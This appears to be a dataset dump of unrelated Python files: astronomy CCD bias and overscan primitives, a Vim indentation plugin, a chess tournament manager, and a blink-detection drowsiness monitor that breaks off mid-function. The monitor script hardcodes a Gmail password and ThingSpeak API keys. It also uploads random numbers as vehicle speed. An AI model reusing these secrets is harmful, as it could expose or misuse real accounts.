self._get_cal(adinputs, 'processed_bias')\n else:\n bias_list = bias\n\n # Provide a bias AD object for every science frame\n for ad, bias in zip(*gt.make_lists(adinputs, bias_list, force_ad=True)):\n if ad.phu.get(timestamp_key):\n log.warning(\"No changes will be made to {}, since it has \"\n \"already been processed by biasCorrect\".\n format(ad.filename))\n continue\n\n if bias is None:\n if 'qa' in self.mode:\n log.warning(\"No changes will be made to {}, since no \"\n \"bias was specified\".format(ad.filename))\n continue\n else:\n raise OSError('No processed bias listed for {}'.\n format(ad.filename))\n\n try:\n gt.check_inputs_match(ad, bias, check_filter=False,\n check_units=True)\n except ValueError:\n bias = gt.clip_auxiliary_data(ad, aux=bias, aux_type='cal')\n # An Error will be raised if they don't match now\n gt.check_inputs_match(ad, bias, check_filter=False,\n check_units=True)\n\n log.fullinfo('Subtracting this bias from {}:\\n{}'.\n format(ad.filename, bias.filename))\n ad.subtract(bias)\n\n # Record bias used, timestamp, and update filename\n ad.phu.set('BIASIM', bias.filename, self.keyword_comments['BIASIM'])\n gt.mark_history(ad, primname=self.myself(), 
keyword=timestamp_key)\n ad.update_filename(suffix=suffix, strip=True)\n if bias.path:\n add_provenance(ad, bias.filename, md5sum(bias.path) or \"\", self.myself())\n\n timestamp = datetime.now()\n return adinputs\n\n def overscanCorrect(self, adinputs=None, **params):\n adinputs = self.subtractOverscan(adinputs,\n **self._inherit_params(params, \"subtractOverscan\"))\n adinputs = self.trimOverscan(adinputs, suffix=params[\"suffix\"])\n return adinputs\n\n def subtractOverscan(self, adinputs=None, **params):\n \"\"\"\n This primitive subtracts the overscan level from the image. The\n level for each row (currently the primitive requires that the overscan\n region be a vertical strip) is determined in one of the following\n ways, according to the *function* and *order* parameters:\n\n \"poly\": a polynomial of degree *order* (1=linear, etc)\n \"spline\": using *order* equally-sized cubic spline pieces or, if\n order=None or 0, a spline that provides a reduced chi^2=1\n \"none\": no function is fit, and the value for each row is determined\n by the overscan pixels in that row\n\n The fitting is done iteratively but, in the first instance, a running\n median of the rows is calculated and rows that deviate from this median\n are rejected (and used in place of the actual value if function=\"none\")\n\n Parameters\n ----------\n suffix: str\n suffix to be added to output files\n niterate: int\n number of rejection iterations\n high_reject: float/None\n number of standard deviations above which to reject high pixels\n low_reject: float/None\n number of standard deviations above which to reject low pixels\n nbiascontam: int/None\n number of columns adjacent to the illuminated region to reject\n function: str/None\n function to fit (\"poly\" | \"spline\" | \"none\")\n order: int/None\n order of polynomial fit or number of spline pieces\n \"\"\"\n log = self.log\n log.debug(gt.log_message(\"primitive\", self.myself(), \"starting\"))\n timestamp_key = self.timestamp_keys[self.myself()]\n\n sfx = params[\"suffix\"]\n niterate = params[\"niterate\"]\n lo_rej = params[\"low_reject\"]\n hi_rej = params[\"high_reject\"]\n order = params[\"order\"] or 0 # None is the same as 0\n func = (params[\"function\"] or 'none').lower()\n nbiascontam = params[\"nbiascontam\"]\n\n for ad in adinputs:\n if ad.phu.get(timestamp_key):\n log.warning(\"No changes will be made to {}, since it has \"\n \"already been processed by subtractOverscan\".\n format(ad.filename))\n continue\n\n osec_list = ad.overscan_section()\n dsec_list = ad.data_section()\n for ext, osec, dsec in zip(ad, osec_list, dsec_list):\n x1, x2, y1, y2 = osec.x1, osec.x2, osec.y1, osec.y2\n if x1 > dsec.x1: # Bias on right\n x1 += nbiascontam\n x2 -= 1\n else: # Bias on left\n x1 += 1\n x2 -= nbiascontam\n\n row = np.arange(y1, y2)\n data = np.mean(ext.data[y1:y2, x1:x2], axis=1)\n # Weights are used to determine number of spline pieces\n # should be the estimate of the mean\n wt = np.sqrt(x2 - x1) / ext.read_noise()\n if ext.is_in_adu():\n wt *= ext.gain()\n\n medboxsize = 2 # really 2n+1 = 5\n for iter in range(niterate+1):\n # The UnivariateSpline will make reduced-chi^2=1 so it will\n # fit bad rows. Need to mask these before starting, so use a\n # running median. 
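The first iteration above screens rows against a running median before any function is fit; here is that rejection step in isolation, with a simple sliding-window median. Box size and sigma are assumed toy values, not the primitive's settings:

```python
# The running-median rejection step above, in isolation: flag points
# more than k*sigma away from a sliding-window median.
import numpy as np

def running_median_mask(data, boxsize=2, k=3.0, sigma=1.0):
    n = len(data)
    runmed = np.empty(n)
    for i in range(n):
        lo, hi = max(0, i - boxsize), min(n, i + boxsize + 1)
        runmed[i] = np.median(data[lo:hi])
    return np.abs(data - runmed) > k * sigma, runmed

rng = np.random.default_rng(0)
data = 100.0 + rng.normal(0.0, 0.3, 50)   # flat level plus read noise
data[17] = 140.0                           # one cosmic-ray-like row
mask, runmed = running_median_mask(data, sigma=0.3)
assert mask[17]                            # the outlier is rejected
```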
Probably a good starting point for all fits.\n if iter == 0 or func == 'none':\n medarray = np.full((medboxsize * 2 + 1, y2 - y1), np.nan)\n for i in range(-medboxsize, medboxsize + 1):\n mx1 = max(i, 0)\n mx2 = min(y2 - y1, y2 - y1 + i)\n medarray[medboxsize + i, mx1:mx2] = data[:mx2 - mx1]\n runmed = np.ma.median(np.ma.masked_where(np.isnan(medarray),\n medarray), axis=0)\n residuals = data - runmed\n sigma = np.sqrt(x2 - x1) / wt # read noise\n\n mask = np.logical_or(residuals > hi_rej * sigma\n if hi_rej is not None else False,\n residuals < -lo_rej * sigma\n if lo_rej is not None else False)\n\n # Don't clip any pixels if iter==0\n if func == 'none' and iter < niterate:\n # Replace bad data with running median\n data = np.where(mask, runmed, data)\n elif func != 'none':\n if func == 'spline':\n if order:\n # Equally-spaced knots (like IRAF)\n knots = np.linspace(row[0], row[-1], order+1)[1:-1]\n bias = LSQUnivariateSpline(row[~mask], data[~mask], knots)\n else:\n bias = UnivariateSpline(row[~mask], data[~mask],\n w=[wt]*np.sum(~mask))\n else:\n bias_init = models.Chebyshev1D(degree=order,\n c0=np.median(data[~mask]))\n fit_f = fitting.LinearLSQFitter()\n bias = fit_f(bias_init, row[~mask], data[~mask])\n\n residuals = data - bias(row)\n sigma = np.std(residuals[~mask])\n\n # using \"-=\" won't change from int to float\n if func != 'none':\n data = bias(np.arange(0, ext.data.shape[0]))\n ext.data = ext.data - np.tile(data,\n (ext.data.shape[1],1)).T.astype(np.float32)\n\n ext.hdr.set('OVERSEC', '[{}:{},{}:{}]'.format(x1+1,x2,y1+1,y2),\n self.keyword_comments['OVERSEC'])\n ext.hdr.set('OVERSCAN', np.mean(data),\n self.keyword_comments['OVERSCAN'])\n ext.hdr.set('OVERRMS', sigma, self.keyword_comments['OVERRMS'])\n\n # Timestamp, and update filename\n gt.mark_history(ad, primname=self.myself(), keyword=timestamp_key)\n ad.update_filename(suffix=sfx, strip=True)\n\n return adinputs\n\n def trimOverscan(self, adinputs=None, suffix=None):\n \"\"\"\n The trimOverscan primitive trims the overscan region from the input\n AstroData object and updates the headers.\n\n Parameters\n ----------\n suffix: str\n suffix to be added to output files\n \"\"\"\n log = self.log\n log.debug(gt.log_message(\"primitive\", self.myself(), \"starting\"))\n timestamp_key = self.timestamp_keys[self.myself()]\n\n for ad in adinputs:\n if ad.phu.get(timestamp_key) is not None:\n log.warning('No changes will be made to {}, since it has '\n 'already been processed by trimOverscan'.\n format(ad.filename))\n continue\n\n ad = gt.trim_to_data_section(ad,\n keyword_comments=self.keyword_comments)\n # HACK! 
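For function="poly" the code above fits models.Chebyshev1D with a LinearLSQFitter; the same two astropy calls in isolation, on exactly quadratic fake overscan levels so the fit can be checked:

```python
# The astropy fit used for function="poly" above, in isolation:
# a degree-2 Chebyshev model fit to exactly quadratic data.
import numpy as np
from astropy.modeling import models, fitting

rows = np.arange(0, 100, dtype=float)
overscan = 250.0 + 0.05 * rows - 1e-4 * rows**2   # fake bias level per row

model_init = models.Chebyshev1D(degree=2)
fitter = fitting.LinearLSQFitter()
best_fit = fitter(model_init, rows, overscan)

assert np.allclose(best_fit(rows), overscan)       # exact data, exact fit
```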
Need to update FITS header because imaging primitives edit it\n if 'IMAGE' in ad.tags:\n for ext in ad:\n if ext.wcs is not None:\n wcs_dict = adwcs.gwcs_to_fits(ext, ad.phu)\n ext.hdr.update(wcs_dict)\n\n # Set keyword, timestamp, and update filename\n ad.phu.set('TRIMMED', 'yes', self.keyword_comments['TRIMMED'])\n gt.mark_history(ad, primname=self.myself(), keyword=timestamp_key)\n ad.update_filename(suffix=suffix, strip=True)\n return adinputs\n","sub_path":"geminidr/core/primitives_ccd.py","file_name":"primitives_ccd.py","file_ext":"py","file_size_in_byte":12433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"353487639","text":"import _vim\n\ndef go_down():\n return _go(1)\n\ndef go_up():\n return _go(-1)\n\ndef _go(direction):\n line_level = get_next_line_level(direction)\n if line_level == None:\n return\n\n line, level = line_level\n _vim.goto(line, level)\n\n\ndef get_next_line_level(direction):\n current_line = _vim.line_number()\n current_level = get_level(current_line)\n\n next_line = current_line\n while True:\n next_line += direction\n\n if direction == 1 and next_line > len(_vim.buffer()):\n return None\n\n if direction == -1 and next_line <= 0:\n return None\n\n next_level = get_level(next_line)\n if next_level != current_level:\n return (next_line, next_level)\n\n\ndef get_level(line_number):\n line = _vim.buffer()[line_number]\n column = 0\n for symbol in line:\n if symbol == \"\\t\":\n column += 1\n\n return column\n","sub_path":"pythonx/indentation/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"561358560","text":"import models\nimport views\nimport db\nimport re\nimport os\n\n\n# Controlleur du menu principal\nclass Main_menu_controller:\n def __init__(self):\n self.view = views.Views()\n self.choices = {\n \"1\": self.create_tournament,\n \"2\": self.add_player,\n \"3\": self.edit_player,\n \"4\": self.start_round,\n \"5\": self.generate_reports,\n \"6\": self.import_data\n }\n self.players_created = 0\n self.player_instances = []\n self.tournament_created = 0\n self.tournament_instance = None\n self.current_round = 0\n self.round_instances = []\n\n def run(self):\n while True:\n '''On vérifie si les 4 rounds du tournoi on été joués. 
Si oui, on reset certaines valeurs\n afin de pouvoir créer un tournoi suivant'''\n if len(self.round_instances) == 4:\n self.players_created = 0\n self.player_instances = []\n self.tournament_created = 0\n self.tournament_instance = None\n self.current_round = 0\n self.round_instances = []\n go_to = self.view.main_menu_view(\n self.players_created, self.tournament_created, self.current_round,\n self.tournament_instance, db.database.name)\n action = self.choices.get(go_to)\n if action:\n action()\n else:\n views.Views().wrong_input_view(go_to)\n\n def create_tournament(self):\n view = views.Tournament_views()\n if self.tournament_created == 0:\n tournament_data = view.create_tournament_view()\n tc = Tournament_controller(tournament_data)\n if tc.is_data_valid():\n tournament = models.Tournament(*tournament_data)\n view.success_message_tournament(tournament.name)\n self.tournament_created += 1\n self.tournament_instance = tournament\n tournament.save_to_db()\n else:\n '''A tournament has already been created'''\n view.already_created_view()\n\n def add_player(self):\n if self.tournament_instance is None:\n return views.Views().error_step_view()\n view = views.Players_views()\n if self.players_created <= 7:\n player_data = view.create_player_view(self.players_created + 1)\n pc = Player_controller(player_data)\n if pc.is_data_valid():\n player = models.Player(*player_data)\n view.success_message_player(player.first_name, player.last_name)\n self.players_created += 1\n self.player_instances.append(player)\n player.save_to_db()\n self.tournament_instance.update_players_list(player)\n else:\n '''More than 8 players have already been created'''\n view.too_many_players_view()\n\n def edit_player(self):\n edit_player_controller = Edit_player_menu_controller(\n self.player_instances)\n edit_player_controller.run()\n\n def start_round(self):\n view = views.Rounds_views()\n # The round cannot start if one of the 3 conditions below is met\n if self.players_created < 8:\n return view.not_enough_players_view()\n if self.tournament_created == 0:\n return view.no_tournament_created_view()\n if self.current_round == 4:\n return view.no_more_round_view()\n\n round_name = view.start_round_view(self.current_round)\n my_round = models.Round(round_name, self.tournament_instance.id)\n self.round_instances.append(my_round)\n\n # Generate paires first round\n if self.current_round == 0:\n my_round.generer_paires_round1(self.player_instances)\n\n # Generate paires following rounds\n else:\n my_round.generer_paires_next_rounds(self.player_instances)\n\n # Display matches list\n match_list = my_round.match_instances\n view.display_matches_view(match_list)\n\n # Set the round results\n rc = Set_matches_results_menu_controller(match_list)\n rc.run()\n\n my_round.set_end_time()\n self.tournament_instance.update_rounds_list(my_round)\n self.current_round += 1\n\n def generate_reports(self):\n grmc = Generate_reports_menu_controller()\n grmc.run()\n\n def import_data(self):\n idmc = Import_data_menu_controller()\n players, tournaments, valid_json_file = idmc.run()\n\n if valid_json_file is False:\n # db file is not valid. 
Go back to main menu\n return\n elif len(tournaments) == 0:\n # db file is empty\n self.player_instances.clear()\n self.players_created = 0\n self.tournament_created = 0\n self.tournament_instance = None\n self.current_round = 0\n self.round_instances = []\n return\n\n def get_player_inst_from_id(id):\n players_list = self.player_instances\n result = [player for player in players_list if player.id == id]\n return result[0]\n\n # Import basic tournament data\n self.tournament_created = len(tournaments)\n last_tournament = len(tournaments) - self.tournament_created\n self.tournament_instance = models.Tournament(\n tournaments[last_tournament][\"name\"],\n tournaments[last_tournament][\"place\"],\n tournaments[last_tournament][\"start_date\"],\n tournaments[last_tournament][\"end_date\"],\n tournaments[last_tournament][\"description\"],\n tournaments[last_tournament][\"time_control\"],\n id=tournaments[last_tournament][\"id\"])\n\n # Import players data\n self.players_created = len(players)\n self.player_instances.clear()\n for player in players:\n player_inst = models.Player(player[\"first_name\"],\n player[\"last_name\"],\n player[\"birthdate\"],\n player[\"sex\"],\n player[\"ranking\"],\n id=player[\"id\"],\n has_played_with=player[\"has_played_with\"])\n self.player_instances.append(player_inst)\n self.tournament_instance.update_players_list(player_inst)\n\n # Import rounds & matches data\n self.current_round = len(tournaments[last_tournament][\"rounds\"])\n for my_round in tournaments[last_tournament][\"rounds\"]:\n round_inst = models.Round(my_round[\"name\"],\n my_round[\"tournament_id\"],\n start_datetime=my_round[\"start_datetime\"],\n end_datetime=my_round[\"end_datetime\"])\n\n for match in my_round[\"matches_list\"]:\n p1 = get_player_inst_from_id(match[\"player1_id\"])\n p2 = get_player_inst_from_id(match[\"player2_id\"])\n match_inst = models.Match.create_from_imported_data(\n p1, p2, match[\"player1_score\"], match[\"player2_score\"])\n\n round_inst.add_match_to_matches_list(match_inst)\n\n self.tournament_instance.rounds.append(round_inst)\n self.round_instances.append(round_inst)\n\n# Controlleur du sous-menu permettant de choisir le fichier .json de la db a importer\n\n\nclass Import_data_menu_controller:\n def __init__(self):\n self.json_files = [file for file in os.listdir('.') if file.endswith('.json')]\n self.view = views.Import_views()\n self.choices = {}\n for num, file in enumerate(self.json_files, start=1):\n self.choices[str(num)] = (self.import_file, file)\n\n def run(self):\n choice = self.view.import_data(self.json_files)\n action = self.choices.get(choice)\n if action:\n return action[0](action[1])\n else:\n return 'no player', 'no tournament', False\n\n def import_file(self, file):\n players, tournaments = db.import_data_from_json(file)\n return players.all(), tournaments.all(), True\n\n# Controlleur du sous-menu permettant de chosir le joueur sur lequel on veut modifier le classement\n\n\nclass Edit_player_menu_controller:\n def __init__(self, players):\n self.view = views.Players_views()\n self.players = players\n self.choices = {}\n for num, player in enumerate(self.players, start=1):\n self.choices[str(num)] = (self.edit_player, player)\n\n def run(self):\n choice = self.view.edit_players_view(self.players)\n action = self.choices.get(choice)\n if action:\n action[0](action[1])\n else:\n views.Views().wrong_input_view(choice)\n\n def edit_player(self, player):\n new_ranking = self.view.edit_player_view(player)\n pc = Player_controller(\n [player.first_name, 
player.last_name, player.birthdate,\n player.sex, new_ranking])\n if pc.is_data_valid():\n player.update_ranking(int(new_ranking))\n\n# Controlleur du sous-menu permettant de choisir le match sur lequel on souhaite définir les résultats\n\n\nclass Set_matches_results_menu_controller:\n def __init__(self, matches):\n self.view = views.Matches_views()\n self.matches = matches\n self.matches_instances = []\n self.results_set = 0\n self.choices = {}\n for num, match in enumerate(self.matches, start=1):\n self.choices[str(num)] = (self.set_match_result, match)\n\n def run(self):\n while self.results_set < 4:\n choice = self.view.set_matches_result_view(self.matches)\n action = self.choices.get(choice)\n if action:\n action[0](action[1])\n else:\n views.Views().wrong_input_view(choice)\n self.run()\n\n def set_match_result(self, match):\n smc = Set_match_result_menu_controller(match)\n match_instance = smc.run()\n self.matches_instances.append(match_instance)\n my_set = set(self.matches_instances)\n self.results_set = len(my_set)\n\n# Controlleur du sous-menu permettant d'ajouter les résultats d'un match\n\n\nclass Set_match_result_menu_controller:\n def __init__(self, match):\n self.view = views.Matches_views()\n self.match = match\n self.choices = {\n \"1\": (self.set_winner, match.player1),\n \"2\": (self.set_winner, match.player2),\n \"3\": (self.set_draw, None)\n }\n\n def run(self):\n choice = self.view.set_match_result_view(self.match)\n action = self.choices.get(choice)\n if action:\n return action[0](action[1])\n else:\n views.Views().wrong_input_view(choice)\n self.run()\n\n def set_winner(self, player):\n return self.match.set_results(is_draw=False, winner=player)\n\n def set_draw(self, _):\n return self.match.set_results(is_draw=True, winner=None)\n\n# Controlleur du sous-menu permettant de choisir le rapport que l'on souhaite consulter\n\n\nclass Generate_reports_menu_controller:\n def __init__(self):\n self.view = views.Reports_views()\n self.data = db.database\n self.choices = {\n \"1\": self.get_all_players,\n \"2\": self.get_players_from_tournament,\n \"3\": self.get_all_tournaments,\n \"4\": self.get_rounds_from_tournament,\n \"5\": self.get_matches_from_tournament\n }\n\n def run(self):\n choice = self.view.choose_report_view()\n action = self.choices.get(choice)\n if action:\n action()\n else:\n views.Views().wrong_input_view(choice)\n\n def get_all_players(self):\n self.view.get_all_players_view(self.data.table('players'), None)\n\n def get_all_tournaments(self):\n self.view.get_all_tournaments_view(self.data.table('tournaments'))\n\n def get_players_from_tournament(self):\n players_list = self.data.table('players')\n final_list = []\n for tournament in self.data.table('tournaments'):\n tournament_players = tournament[\"players\"]\n for player_id in tournament_players:\n res = [\n element for element in players_list if element['id'] == player_id]\n final_list.append(res[0])\n self.view.get_all_players_view(final_list, tournament[\"name\"])\n final_list.clear()\n\n def get_rounds_from_tournament(self):\n final_list = []\n for tournament in self.data.table('tournaments'):\n for my_round in tournament[\"rounds\"]:\n final_list.append(my_round)\n self.view.get_rounds_from_tournament(\n final_list, tournament[\"name\"])\n final_list.clear()\n\n def get_matches_from_tournament(self):\n match_list = []\n\n for tournament in self.data.table('tournaments'):\n for my_round in tournament[\"rounds\"]:\n for match in my_round[\"matches_list\"]:\n match_list.append(match)\n\n for m in 
match_list:\n User = db.Query()\n p1 = db.database.table('players').search(\n User.id == m[\"player1_id\"])\n p2 = db.database.table('players').search(\n User.id == m[\"player2_id\"])\n m[\"p1_name\"] = p1[0][\"first_name\"] + ' ' + p1[0][\"last_name\"]\n m[\"p2_name\"] = p2[0][\"first_name\"] + ' ' + p2[0][\"last_name\"]\n\n self.view.get_matches_from_tournament(\n match_list, tournament[\"name\"])\n match_list.clear()\n\n# Controlleur permettant que les données entrées par l'utilisateur sont conforme à ce qui est attendu en db\n\n\nclass Tournament_controller:\n def __init__(self, tournament_data):\n self.tournament_data = tournament_data\n\n def is_data_valid(self):\n regex_startdate = re.match(\n '^[0-3]?[0-9]/[0-3]?[0-9]/(?:[0-9]{2})?[0-9]{2}$', self.tournament_data[2])\n regex_enddate = re.match(\n '^[0-3]?[0-9]/[0-3]?[0-9]/(?:[0-9]{2})?[0-9]{2}$', self.tournament_data[3])\n if bool(regex_startdate) and bool(regex_enddate):\n # data collected from inputs are valid\n return True\n else:\n views.Views().error_view('Format de date non valide.')\n\n# Controlleur permettant que les données entrées par l'utilisateur sont conforme à ce qui est attendu en db\n\n\nclass Player_controller:\n def __init__(self, player_data):\n self.model = models.Player\n self.player_data = player_data\n\n def is_data_valid(self):\n if self._check_valid_date() and self._check_valid_sex() and self._check_valid_rank():\n return True\n\n def _check_valid_date(self):\n regex_birthdate = re.match(\n '^[0-3]?[0-9]/[0-3]?[0-9]/(?:[0-9]{2})?[0-9]{2}$', self.player_data[2])\n if bool(regex_birthdate):\n return True\n else:\n views.Views().error_view('Format de date non valide.')\n\n def _check_valid_sex(self):\n if self.player_data[3].upper() == 'M' or self.player_data[3].upper() == 'F':\n return True\n else:\n views.Views().error_view('Sexe non valide. 
Veuillez entrer M ou F.')\n\n def _check_valid_rank(self):\n if self.player_data[4].isdigit():\n if int(self.player_data[4]) > 0:\n return True\n else:\n views.Views().error_view('Votre classement doit être un entier positif.')\n","sub_path":"controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":15727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"14869321","text":"import win32com.client as wincl\r\nfrom scipy.spatial import distance as dist\r\nfrom imutils.video import FileVideoStream\r\nfrom imutils.video import VideoStream\r\nfrom imutils import face_utils\r\nimport numpy as np\r\nimport argparse\r\nimport imutils\r\nimport time\r\nimport dlib\r\nimport cv2\r\nimport xlwt\r\nfrom xlwt import Workbook\r\nimport urllib\r\nimport json\r\nimport random\r\nfrom threading import Thread\r\nfrom firebase import firebase\r\nimport pandas as pd\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.metrics import f1_score\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom sklearn import svm\r\ndf=pd.read_csv('H:/enginx/pycodes/foofin.csv');\r\ncol=['Speed','Bphm']\r\nX=df[col]\r\ny=df['Out']\r\nclf= LogisticRegression()\r\nclf1= RandomForestClassifier(max_depth=2,random_state=0)\r\nclf2=KNeighborsClassifier(n_neighbors=3)\r\nclf3 = MLPClassifier(solver='lbfgs', alpha=1e-5,hidden_layer_sizes=(6,2), random_state=1)\r\nclf4 = svm.SVC()\r\nclf.fit(X,y)\r\nclf1.fit(X,y)\r\nclf2.fit(X,y)\r\nclf3.fit(X,y)\r\nclf4.fit(X,y) \r\nimport os\r\nimport thingspeak\r\nimport urllib\r\nimport json\r\nimport time\r\nimport numpy as np\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.metrics import f1_score\r\nfrom sklearn.neural_network import MLPClassifier\r\nimport matplotlib.pyplot as plt\r\nimport scikitplot as skplt\r\nimport seaborn as sns\r\nfrom sklearn import svm\r\n\r\nCOUNTER = 0\r\nSND=0\r\nSND1=0\r\nTOTAL = 0\r\nTOTAL1 = 0\r\nTOTAL2=0\r\nSPEED=0\r\ni=0\r\nj=0\r\nj1=0\r\ndef convert(x):\r\n a=x.split(':')\r\n x=a[5]\r\n x=x[1:x[1:].find('\"')+1]\r\n x=int(x)\r\n return x\r\n \r\ndef send_mail(recipient, subject, message):\r\n import smtplib\r\n from email.mime.multipart import MIMEMultipart\r\n from email.mime.text import MIMEText\r\n\r\n username = \"logixpltd@gmail.com\"\r\n password = \"timebomb321\"\r\n\r\n msg = MIMEMultipart()\r\n msg['From'] = username\r\n msg['To'] = recipient\r\n msg['Subject'] = subject\r\n msg.attach(MIMEText(message))\r\n\r\n print('sending mail to ' + recipient + ' on ' + subject)\r\n mailServer = smtplib.SMTP('smtp.gmail.com', 587)\r\n mailServer.ehlo()\r\n mailServer.starttls()\r\n mailServer.ehlo()\r\n mailServer.login(username, password)\r\n mailServer.sendmail(username, recipient, msg.as_string())\r\n mailServer.close()\r\n \r\ndef eye_aspect_ratio(eye):\r\n\tA = dist.euclidean(eye[1], eye[5])\r\n\tB = dist.euclidean(eye[2], eye[4])\r\n\tC = dist.euclidean(eye[0], eye[3])\r\n\tear = (A + B) / (2.0 * C)\r\n\treturn ear\r\ndef f1():\r\n wb=Workbook()\r\n s1 = wb.add_sheet('Sheet 1')\r\n global 
COUNTER,SND,SND1,TOTAL,TOTAL1,TOTAL2,SPEED,i,j,j1,x\r\n    camera = cv2.VideoCapture(1)\r\n    predictor_path = 'shape_predictor_68_face_landmarks.dat'\r\n    EYE_AR_THRESH = 0.3\r\n    EYE_AR_CONSEC_FRAMES = 3\r\n    print(\"[INFO] loading facial landmark predictor...\")\r\n    detector = dlib.get_frontal_face_detector()\r\n    predictor = dlib.shape_predictor(predictor_path)\r\n    (lStart, lEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"left_eye\"]\r\n    (rStart, rEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"right_eye\"] \r\n    while True:\r\n    \t\r\n        if(i%66==0):\r\n            SND1=TOTAL-TOTAL2\r\n            s1.write(j,0,SND1)\r\n            TOTAL2=TOTAL\r\n            j=j+1\r\n        if(i%100==0):\r\n            if j1>120:\r\n                j1=0;\r\n            SPEED=random.randint(j1,j1+20);\r\n            j1=j1+20\r\n        ret,frame = camera.read()\r\n        frame = imutils.resize(frame, width=450)\r\n        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n        rects = detector(gray, 0)\r\n        for rect in rects:\r\n            shape = predictor(gray,rect)\r\n            shape = face_utils.shape_to_np(shape)\r\n            leftEye = shape[lStart:lEnd]\r\n            rightEye = shape[rStart:rEnd]\r\n            leftEAR = eye_aspect_ratio(leftEye)\r\n            rightEAR = eye_aspect_ratio(rightEye)\r\n            ear = (leftEAR + rightEAR) / 2.0\r\n            leftEyeHull = cv2.convexHull(leftEye)\r\n            rightEyeHull = cv2.convexHull(rightEye)\r\n            cv2.drawContours(frame, [leftEyeHull], -1, (0, 255, 0), 1)\r\n            cv2.drawContours(frame, [rightEyeHull], -1, (0, 255, 0), 1)\r\n            if ear < EYE_AR_THRESH:\r\n                COUNTER += 1\r\n            else:\r\n                if COUNTER >= EYE_AR_CONSEC_FRAMES:\r\n                    TOTAL += 1\r\n                COUNTER = 0\r\n            cv2.putText(frame, \"Blinks: {}\".format(TOTAL), (10, 30),\r\n                cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\r\n            cv2.putText(frame, \"EAR: {:.2f}\".format(ear), (300, 30),\r\n                cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\r\n        \r\n        cv2.imshow(\"Frame\", frame)\r\n        key = cv2.waitKey(1) & 0xFF\r\n        if key == ord(\"q\"):\r\n            wb.save('exceln.xls')\r\n            break\r\n        i=i+1\r\n        \r\n    cv2.destroyAllWindows()\r\n    camera.release()  # cv2.VideoCapture has no stop(); release() frees the device\r\n    \r\ndef f2():\r\n    global TOTAL,TOTAL1,SPEED\r\n    fr=firebase.FirebaseApplication('https://a124-270e9.firebaseio.com/')\r\n    while True:\r\n        time.sleep(25)\r\n        #TS1 = urllib.request.urlopen(\"https://api.thingspeak.com/update?api_key=EGB3IM8MPQH4U8VK&field6=\"+str(SPEED)+\"&field3=\"+str(TOTAL-TOTAL1))\r\n        TS1 = urllib.request.urlopen(\"https://api.thingspeak.com/update?api_key=JR3OADAOZLN12XA4&field6=\"+str(SPEED)+\"&field3=\"+str(TOTAL-TOTAL1))\r\n        TS1.close()\r\n        result1=fr.put('/','Blinkrate',str(TOTAL-TOTAL1))\r\n        result2=fr.put('/','Speed',str(SPEED))\r\n        TOTAL1=TOTAL\r\ndef f3():\r\n    time.sleep(37)\r\n    p=0#Temperature\r\n    p1=0#Blink_Warning\r\n    p2=0#Blink_Danger\r\n    p3=0#Humidity\r\n    p4=0#Flame\r\n    p5=0#Vibration\r\n    p6=0#Collision\r\n    #READ_API_KEY_1='4W5UVHGWABFCNU0E'\r\n    #CHANNEL_ID_1= '562330'\r\n    READ_API_KEY_1='TIV70K9YECFW8T0C'\r\n    CHANNEL_ID_1= '566179'\r\n    speak = wincl.Dispatch(\"SAPI.SpVoice\")\r\n    while True:\r\n        h0=0\r\n        h1=0\r\n        h2=0\r\n        ch = thingspeak.Channel(id=CHANNEL_ID_1,api_key=READ_API_KEY_1)\r\n        x=ch.get_field_last(1)\r\n        a1=convert(x)#Temperature\r\n        x=ch.get_field_last(3)\r\n        a3=convert(x)#Blink rate\r\n        x=ch.get_field_last(6)\r\n        a6=convert(x)#Speed\r\n        x=ch.get_field_last(2)\r\n        a2=convert(x)#Humidity\r\n        x=ch.get_field_last(7)\r\n        a7=convert(x)#Flame\r\n        x=ch.get_field_last(5)\r\n        a5=convert(x)#Vibration\r\n        #x=ch.get_field_last(4)\r\n        #a4=convert(x)#Collision\r\n        a4=0\r\n        if(a1>29 and p==0):\r\n            send_mail('yesh385@gmail.com','Warning!','Temperature of package compromised')\r\n            speak.Speak(\"Temperature Compromised\")\r\n            p=1\r\n        if(a2>60 and p3==0):\r\n            
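# one-shot alert: once a2 (humidity) exceeds 60, p3 is set so the mail is sent only the first time\r\n            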
